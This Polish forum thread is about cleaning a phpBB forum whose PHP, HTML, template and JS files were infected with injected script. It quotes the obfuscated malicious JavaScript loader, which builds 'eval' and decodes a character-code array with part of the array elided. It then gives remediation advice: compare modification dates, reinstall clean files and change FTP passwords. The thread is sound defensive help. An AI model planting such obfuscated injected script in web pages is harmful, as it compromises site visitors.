<< 31 sty 2014, 08:16:09 >>
Jak to jak... Odnaleźć ten fragment w plikach.
Przecież wyraźnie na pierwszy rzut oka najbardziej podejrzanymi fragmentami są dwa ciągi wyglądające mniej więcej:
Kod: Zaznacz cały
<script type="text/javascript" language="javascript" >
if(020===0x10)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){w=window;e=w["e".concat(v)];}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,
(...)
,39,59);}w=f;s=[];r=String;for(i=0;-i+442!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCharCode"]((1*w[j]+j%3));}if(0x10==020)try{(w+s)()}catch(asga){e("if(1)"+s+"");}</script>
Najłatwiej byłoby przywrócić czystą kopię wszystkiego. Pozostaje pytanie - czy takową posiadasz.
Jeśli nie, to mi najłatwiej zawsze było odnaleźć zmodyfikowane pliki sortując je w kliencie FTP po dacie modyfikacji -
tu jednak przeszkodę możesz napotkać w sytuacji, jeśli niedawno wszystko usunąłeś i przywróciłeś już zainfekowaną kopię. Jeśli jednak instalowałeś czyste pliki, a dopiero później zostały one przez kogoś/coś zmodyfikowane, to powinieneś dojrzeć wyraźną różnicę w dacie modyfikacji plików.
Poza tym zawsze można po prostu uruchomić wyszukiwanie określonej frazy we wszystkich plikach (
najłatwiej będzie lokalnie na komputerze w kopii wszystkich plików). Choć może się okazać, że w plikach PHP kod wygląda zupełnie inaczej, jest dodatkowo zaszyfrowany i wykorzystuje funkcje eval(), base64 itp. - ale z reguły są to rzucające się w oczy fragmenty kodu dla osoby choć trochę programującej w PHP.
Najczęściej (
choć nie tylko!) infekowane bywają pliki o nazwach index/main/home.php/.html, takie weź na pierwszy ogień. Poza tym należy zwrócić uwagę, czy nie istnieją dodatkowe pliki, których oryginalnie być nie powinno.
Aby wyeliminować ponowne występowanie problemów, pozostaje pytanie: jak doszło do infekcji. Częstym przypadkiem jest infekcja komputera webmastera (
keyloggery itp.) i zdobycie hasła FTP. Prawdopodobne jest też wykorzystanie luki w używanym skrypcie, szczególnie jeśli używasz jakiś dodatków, modyfikacji itp. z niezbyt pewnych źródeł (
czyste phpBB by Przemo mam stojące od lat i nic się w moim przypadku nie dzieje, zmodyfikowane mam jedynie zabezpieczenie przed rejestracją botów). Z całą pewnością należy przeskanować własny komputer, pozmieniać hasła FTP itp.
<< 31 sty 2014, 19:34:59 >>
Niestety słowa: "
(...) zainstalowałem skrypt od nowa, (wszystko usuwając) zainstalowałem na nowo (...)" - nie okazały się być zgodne z prawdą. Zdecydowana większość plików *.php/*.html/*.tpl/*.js zainfekowana już w październiku 2012, zawierają dodany automatycznie przez jakiegoś bota wspomniany przeze mnie wyżej złośliwy javascript. Nie pozostaje nic innego jak faktycznie wszystko wyczyścić i zainstalować od zera z dostępnych w sieci paczek instalacyjnych.
Można jedynie pokusić się o skopiowanie obrazków -
awatarów, zdjęć, podpisów wgranych przez użytkowników - dostępnych w folderach /images/avatars/, /images/photos/, /images/signatures/, te pliki zdają się być czyste (
ale tylko obrazki, wszelki indeksy itp. w tych folderach też są zainfekowane).
No i oczywiście baza danych, tę też jak najbardziej zachować i później po zainstalowaniu czystych plików przywrócić.
edycja:
Cytat: "
tak pisałem, ze usunąłem wszystko, ale to nie ta strona "
W takim razie przepraszam, nie byłem świadom problemów z dwoma stronami, sądziłem, że wszystko dotyczy jednej.